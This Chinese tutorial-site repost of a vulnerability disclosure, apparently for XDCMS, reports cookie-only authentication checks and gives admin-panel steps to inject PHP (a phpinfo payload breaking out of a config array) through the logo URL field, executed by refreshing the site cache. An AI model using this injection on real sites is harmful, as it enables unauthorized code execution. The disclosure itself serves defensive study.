来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 漏洞文件: System/modeules/member/login.phpif(empty($_COOKIE[#39;member_user#39;])||empty($_COOKIE[#39;member_userid#39;])) //只判断Cookie是否存在漏洞文件:www.2cto.com system/libs/base.class......
|
漏洞文件: System/modeules/member/login.php
if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])) //只判断Cookie是否存在 漏洞文件:www.2cto.com system/libs/base.class.php if( empty($_COOKIE['member_user'])|| empty($_COOKIE['member_userid'])){ //只判断Cookie Sysplugins\smarty_internal_compile_include.php 参数$include_file 存在问题 在后台2次利用执行代码 1.访问//index.php?m=xdcms&c=setting 2.在 网站LOGO地址:填写”');?><?php phpinfo()?> <?php $_config=array ( 'logourl' => '” 3.点击 后台首页-->>常用操作-->>更新全站缓存 刷新即可执行 刚才添加的php代码 作者 王大随性 修复:见上述分析 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
